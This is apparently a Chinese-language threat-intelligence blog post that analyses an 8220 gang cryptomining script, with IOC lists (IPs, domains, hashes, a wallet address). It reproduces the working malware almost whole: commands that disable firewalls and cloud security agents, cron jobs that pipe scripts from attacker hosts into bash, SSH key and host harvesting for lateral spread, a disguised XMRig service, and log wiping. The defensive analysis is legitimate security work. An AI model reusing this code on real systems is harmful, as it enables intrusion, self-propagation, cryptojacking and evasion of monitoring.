• 新·8220挖矿团伙样本分析报告


    前言

    在队里看见一个IOC信息http://192.210.200.66:1234/xmss,溯源后发现是8220挖矿团伙的挖矿脚本,于是拿下来进行分析。

    溯源

    IP信息

    参数
    IP 192.210.200.66
    地理位置 美国 伊利诺伊州 芝加哥
    ASN 36352
    注册机构 ColoCrossing
    注册地址 Brisbane, Australia, 澳大利亚
    开放端口 15, 22, 49, 80, 102, 123, 138, 443, 554, 902, 1110, 1177, 1234, 1458, 1515, 1604, 1972, 2067, 2082, 2121, 2727, 3338, 3350, 3371, 3374, 3386, 3397, 4022, 4040, 4592, 4911, 4991, 5353, 5357, 5900, 5901, 5984, 6000, 6001, 7676, 7777, 8009, 8080, 8087, 8090, 8098, 9051, 9160, 9333, 9943, 9981, 9999, 10051, 10250, 49152

    反查域名信息:

    apacheorg.top
    w.apacheorg.top
    agent.apacheorg.xyz
    agent.apacheorg.top
    apacheorg.xyz
    w.apacheorg.xyz
    

    涉及恶意文件

    5d4f2a009db79009b1b86d416019d808
    ca815ac01df52cd997ae83de9606d378
    5efc68ad277fe3fc36bfdf7671d8b1de
    d2f5ec8c97e56f11c5f517aed83ed8b2
    3997fb6cd3b603aad1cd40360be6c205
    47be2940ef6970954ce71e8ad6d74a74
    b1582ac0cfbe7cef692d748d1bf4b4b3
    

    挖矿脚本分析

    既然先拿到脚本,就先对脚本各个函数梳理一遍。

    关闭防火墙

    setenforce 0 2>/dev/null 0表示关闭防火墙,2表示以stderr模式输出到/dev/null

    优化性能

    1. 设定最大打开文件数:ulimit -n 65535

    2. 禁用防火墙:ufw disable

    3. 允许恶意网络连接传输

      iptables -P INPUT ACCEPT
      iptables -P OUTPUT ACCEPT
      iptables -P FORWARD ACCEPT
      iptables -F
      
    4. 修改最大内存页hugepages以提高性能:echo "vm.nr_hugepages=$((1168+$(nproc)))" | tee -a /etc/sysctl.conf

    5. 禁用watchdog:echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf

    清除同类挖矿样本

    netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep '23.94.24.12'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
    netstat -antp | grep '134.122.17.13'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
    netstat -antp | grep '66.70.218.40'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
    netstat -antp | grep '209.141.35.17'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
    echo "123"
    netstat -antp | grep '119.28.4.91'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
    netstat -antp | grep '101.32.73.178'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
    netstat -antp | grep 185.238.250.137 | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep tmate | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep kinsing | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep kdevtmpfsi | awk '{print $7}' | awk  -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep pythonww | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep tcpp | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep c3pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep xmr | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep f2pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep crypto-pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep t00ls | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep vihansoft | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep mrbpool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    ps -fe | grep '/tmp' | grep -v '.rsyslogds'|grep -v '.libs'|grep -v grep  | awk '{print $2}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
    ps aux | grep -a -E "kdevtmpfsi|rot|kinsing|solr|f2pool|tcpp|xmr|tmate|185.238.250.137|c3pool" | awk '{print $2}' | xargs kill -9
    

    设定Google公共DNS

    if [ $(cat /etc/resolv.conf | grep 8.8.8.8|grep -v grep|wc -l) -eq '0' ];then
      echo 'nameserver 8.8.8.8' >> /etc/resolv.conf
    else
      echo "ok"
    fi
    

    卸载安全服务

    卸载阿里云盾和监控服务,屏蔽阿里云盾IP

    if ps aux | grep -i '[a]liyun'; then
        /etc/init.d/aegis uninstall
        (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
        (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
        sudo pkill aliyun-service
        killall -9 aliyun-service
        sudo pkill AliYunDun
        killall -9 AliYunDun
        iptables -I INPUT -s 100.100.30.1/28 -j DROP
        iptables -I INPUT -s 140.205.201.0/28 -j DROP
        iptables -I INPUT -s 140.205.201.16/29 -j DROP
        iptables -I INPUT -s 140.205.201.32/28 -j DROP
        iptables -I INPUT -s 140.205.225.192/29 -j DROP
        iptables -I INPUT -s 140.205.225.200/30 -j DROP
        iptables -I INPUT -s 140.205.225.184/29 -j DROP
        iptables -I INPUT -s 140.205.225.183/32 -j DROP
        iptables -I INPUT -s 140.205.225.206/32 -j DROP
        iptables -I INPUT -s 140.205.225.205/32 -j DROP
        iptables -I INPUT -s 140.205.225.195/32 -j DROP
        iptables -I INPUT -s 140.205.225.204/32 -j DROP
        rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
        rm -rf /usr/local/aegis*
        systemctl stop aliyun.service
        systemctl disable aliyun.service
        service bcm-agent stop
        yum remove bcm-agent -y
        apt-get remove bcm-agent -y
        /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop
        /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove
        rm -rf /usr/local/cloudmonitor
    

    卸载腾讯云镜

      elif ps aux | grep -i '[y]unjing'; then
        process=(sap100 secu-tcs-agent sgagent64 barad_agent agent agentPlugInD pvdriver )
        for i in ${process[@]}
        do
          for A in $(ps aux | grep $i | grep -v grep | awk '{print $2}')
          do
            kill -9 $A
          done
        done
        chkconfig --level 35 postfix off
        service postfix stop
        /usr/local/qcloud/stargate/admin/stop.sh
        /usr/local/qcloud/stargate/admin/uninstall.sh
        /usr/local/qcloud/YunJing/uninst.sh
        /usr/local/qcloud/monitor/barad/admin/stop.sh
        /usr/local/qcloud/monitor/barad/admin/uninstall.sh
        rm -rf /usr/local/sa
        rm -rf /usr/local/agenttools
        rm -rf /usr/local/qcloud
        rm -f /etc/cron.d/sgagenttask
    

    设定下载命令

    if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
    if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
    if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
    if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
    echo $DLB
    

    定时脚本下载/更新,并执行

    cronlow(){
      cr=$(crontab -l | grep -q $url | wc -l)
      # 检测crontab中是否有恶意脚本的下载/更新任务
      if [ ${cr} -eq 0 ];then
        crontab -r
        (crontab -l 2>/dev/null; echo "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh")| crontab -
      else
        echo "cronlow skip"
      fi
    }
    

    将定时任务写入以下位置

    /etc/cron.d/`whoami`
    /etc/cron.d/apache
    /var/spool/cron/`whoami`
    /var/spool/cron/crontabs/`whoami`
    /etc/cron.hourly/oanacroner1
    
    cron(){
      if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep -q "205.185.113.151\|5.196.247.12\|bash.givemexyz.xyz\|194.156.99.30\|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMTU2Ljk5LjMwL2QucHkiKS5yZWFkKCkpJw==\|bash.givemexyz.in\|205.185.116.78"
      then
        chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
        crontab -r
      fi
      if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep "$url"
      then
        echo "Cron exists"
      else
        apt-get install -y cron
        yum install -y vixie-cron crontabs
        service crond start
        chkconfig --level 35 crond on
        echo "Cron not found"
        echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/`whoami`
        echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/apache
        echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/nginx
        echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/`whoami`
        mkdir -p /var/spool/cron/crontabs
        echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/crontabs/`whoami`
        mkdir -p /etc/cron.hourly
        echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
        echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/init.d/down
        chattr +ai -V /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 /etc/init.d/down
      fi
      chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
      echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/init.d/down | chmod 755 /etc/init.d/down
    }
    

    搜集用户信息进行传播

    搜集用户ssh端口用户列表主机列表登录凭证信息,并尝试进行登录,然后下载下载执行xmss挖矿脚本

    localgo() {
      echo "localgo start"
      myhostip=$(curl -sL icanhazip.com)
      KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
      KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
      KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
      KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
      HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
      HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
      HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
      HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
      HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
      HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
      USERZ=$(
        echo "root"
        find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -wv ".ssh"
      )
      USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
      sshports=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}' | awk '{print $1}' | sed 's/[^0-9]*//g' | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | sed -e "\$a22")
      userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | grep -vw "." | grep -vw "ssh" | sed '/\./d')
      hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
      keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
      i=0
      for user in $userlist; do
        for host in $hostlist; do
          for key in $keylist; do
            for sshp in $sshports; do
              ((i++))
              if [ "${i}" -eq "20" ]; then
                sleep 5
                ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
                i=0
              fi
    
              #Wait 5 seconds after every 20 attempts and clean up hanging processes
    
              chmod +r $key
              chmod 400 $key
              echo "$user@$host"
              ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
              ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
            done
          done
        done
      done
      # scangogo
      echo "local done"
    }
    

    安装挖矿服务

    setupxmrservice(){
      echo "[*] Removing previous c3pool miner (if any)"
      if sudo -n true 2>/dev/null; then
        sudo systemctl stop c3pool_miner.service
      fi
      killall -9 xmrig
    
      echo "[*] Removing $HOME/c3pool directory"
      rm -rf $HOME/c3pool
      mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh
      if [ $(netstat -antp|grep 'rsyslogds'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ];then
        $DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds
        # preparing script
    
        echo "[*] Creating $HOME/c3pool/miner.sh script"
        mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh
        chmod +x /usr/sbin/.rsyslogds.sh
        /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1
        # preparing script background work and work under reboot
        if ! grep .rsyslogds.sh $HOME/.profile >/dev/null; then
          echo "[*] Adding $HOME/c3pool/miner.sh script to $HOME/.profile"
          echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>$HOME/.profile
        else 
          echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"
        fi
    
        if ! grep rsyslogds.sh /etc/rc.d/rc.local >/dev/null; then
          echo "[*] Adding $HOME/c3pool/miner.sh script to /etc/rc.d/rc.local"
          echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>/etc/rc.d/rc.local
        else 
          echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"
        fi
    
        if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then
          echo "[*] Enabling huge pages"
          echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
          sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
        fi
    
        if ! type systemctl >/dev/null; then
    
          echo "[*] Running miner in the background (see logs in $HOME/c3pool/xmrig.log file)"
          /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1
          echo "ERROR: This script requires \"systemctl\" systemd utility to work correctly."
          echo "Please move to a more modern Linux distribution or setup miner activation after reboot yourself if possible."
    
        else
    
          echo "[*] Creating c3pool_miner systemd service"
          sudo mv /tmp/rsyslogds.service /etc/systemd/system/rsyslogds.service
          echo "[*] Starting c3pool_miner systemd service"
          sudo killall xmrig 2>/dev/null
          sudo systemctl daemon-reload
          sudo systemctl enable rsyslogds.service
          sudo systemctl start rsyslogds.service
          echo "To see miner service logs run \"sudo journalctl -u c3pool_miner -f\" command"
        fi
      fi
    }
    

    这里安装了挖矿程序e5c3720e14a5ea7f678e0a9835d28283

    恶意脚本整体流程分析

    # 杀掉阿里云云盾、腾讯云镜
    der
    
    if [ -w /usr/sbin ]; then
        SPATH=/usr/sbin
      else
      SPATH=/tmp
    fi
    echo $SPATH
    
    # 创建.rsyslogds.sh文件,最后启动挖矿服务用到
    cat >/tmp/.rsyslogds.sh <<EOL
    #!/bin/bash
    # 文件v中是MD5嘛,用以校验.rsyslogds文件的MD5值
    x_md51 = `curl http://agent.apacheorg.xyz:1234/v`
    x_md52 = `md5sum /usr/sbin/.rsyslogds| awk '{print $1}'`
    # 校验MD5
    if [ "$x_md52" = "$x_md51" ]; then
      # 如果.rsyslogds在进程中没有启动,则启动.rsyslogds
      if ! pidof .rsyslogds >/dev/null; then
        /usr/sbin/.rsyslogds
      fi
    else
      # 如果MD5不相同,则从远端下载.rsyslogds程序,并杀掉非真.rsyslogds,运行真.rsyslogds
      $DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds
      pkill .rsyslogds
      /usr/sbin/.rsyslogds
    fi
    EOL
    
    # 创建rsyslogds守护进程
    cat >/tmp/rsyslogds.service <<EOL
    [Unit]
    Description=rsyslogdservice
    [Service]
    ExecStart=/usr/sbin/.rsyslogds
    Restart=always
    Nice=10
    CPUWeight=1
    [Install]
    WantedBy=multi-user.target
    EOL
    
    MD5_1_XMR="e5c3720e14a5ea7f678e0a9835d28283"
    MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`
    
    # 这里看有没有这个路径,没有路径表明肯定没有.rsyslogds文件
    if [ "$SPATH" = "/usr/sbin" ]
    then
      # 同样这,本地校验.rsyslogds, 的MD5值这里应该写错了,应该是不等于
      if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]
      then
        # .rsyslogds文件MD5相同,下载并运行.rsyslogds
        $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
        # 启动挖矿服务
        setupxmrservice
        # 搜集ssh端口、用户列表、主机列表、凭证列表进行登录,传播挖矿脚本
        localgo
        # 设定脚本下载/更新的定时任务
        cron
      else
        # 运行挖矿程序
        $SPATH/.rsyslogds
        # 启动服务
        setupxmrservice
        # 搜集ssh端口、用户列表、主机列表、凭证列表进行登录,传播挖矿脚本
        localgo
        # 设定脚本下载/更新的定时任务
        cron
      fi
    else
      # 下载并运行恶意程序.rsyslogds
      $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
      # 设置脚本执行的定时任务
      cronlow
    fi
    
    # 脚本会检查.inis文件是否存在,不存在就从远端下载后拖到后台运行
    if [ $(ps aux|grep inis|grep -v grep|wc -l) -eq '0' ];
    then
      $DLB $SPATH/.inis $ipurl/.inis;chmod +x $SPATH/.inis
      cd $SPATH
      nohup ./.inis &
    else
      echo "ok"
    fi
    
    history -c
    der
    echo 0>/root/.ssh/authorized_keys
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cronrot
    echo 0>~/.bash_history
    

    .inis文件

    #!/bin/bash
    if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
    if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
    if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
    if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
    echo $DLB
    if [ -w /usr/sbin ]; then
      SPATH=/usr/sbin
    else
      SPATH=/tmp
    fi
    kill(){
      ps aux | grep -v '.rsyslogds' |grep -v '.libs'| grep -v grep | awk '{if($3>50.0) print $2}' | while read procid
      do
        kill -9 $procid
      done
    }
    while true; do
      ipurl="http://agent.apacheorg.top:1234"
      MD5_1_XMR = `curl -fsSL $ipurl/v||wget -q -O - $ipurl/v`
      MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`
      # 这里我怀疑也是写错了,应该是不等于
      if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]; then
        if [ $(ps -aux|grep '.rsyslogds'|grep -v grep|wc -l) -eq '0' ];then
          $SPATH/.rsyslogds
        else
          echo "ok"
        fi
      else
        $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
        chattr +ai $SPATH/.rsyslogds
      fi
      kill
      sleep 1m
    done
    
    

    挖矿程序分析:.rsyslogds

    基本信息

    参数
    文件名 .rsyslogds
    MD5 e5c3720e14a5ea7f678e0a9835d28283
    SHA256 86843e8a0b7079ab20e0f258600ef597b04ffc35d8a706d250e4122bd1cc4692
    文件类型 ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), statically linked, stripped
    文件大小 2077172 bytes
    其他信息 upx

    程序分析

    upx脱壳后,打开发现

    !

    这就是用的现成的XMRig挖矿项目编译,版本为6.7.1,编译日期为2021/01/12

    提取到钱包地址:48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF

    IOC信息

    MD5
    e5c3720e14a5ea7f678e0a9835d28283
    51cf7dde4003aa6901918e373bf91b18
    01972190a83b183b56064d82045de8d6
    caa9ea2c522fc6268c7e976142d48775
    
    IP
    205.185.113.151
    194.156.99.30
    5.196.247.12
    205.185.116.78
    192.210.200.66
    
    domain
    bash.givemexyz.xyz
    bash.givemexyz.in
    agent.apacheorg.top
    
    URL
    http://192.210.200.66:1234/xmss
    http://192.210.200.66:1234/v
    http://192.210.200.66:1234/.rsyslogds
    http://192.210.200.66:1234/.inis
    http://205.185.113.59:1234/xmss
    http://205.185.113.59:1234/v
    http://205.185.113.59:1234/.rsyslogds
    http://205.185.113.59:1234/.inis
    http://agent.apacheorg.top:1234/v
    http://agent.apacheorg.top:1234/xmss
    http://agent.apacheorg.top:1234/.rsyslogds
    http://agent.apacheorg.top:1234/.inis
    
    钱包地址
    48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF
    
  • 相关阅读:
    商户网站使用第三方支付的大致原理和实现
    ASP.NET MVC中检测浏览器版本并提示下载更新
    如何选择使用IEnumerable, ICollection, IList
    IEnumerable和IQueryable的区别以及背后的ExpressionTree表达式树
    IEnumerable是集合,IEnumerator是集合的迭代器
    ASP.NET MVC中使用Session来保持表单的状态
    在ASP.NET MVC中实现Select多选
    总结ASP.NET MVC视图页使用jQuery传递异步数据的几种方式
    在ASP.NET MVC4中使用Quartz.NET执行定时任务
    委托, 泛型委托,Func<T>和Action<T>
  • 原文地址:https://www.cnblogs.com/Mayfly-nymph/p/15525694.html
Copyright © 2020-2023  润新知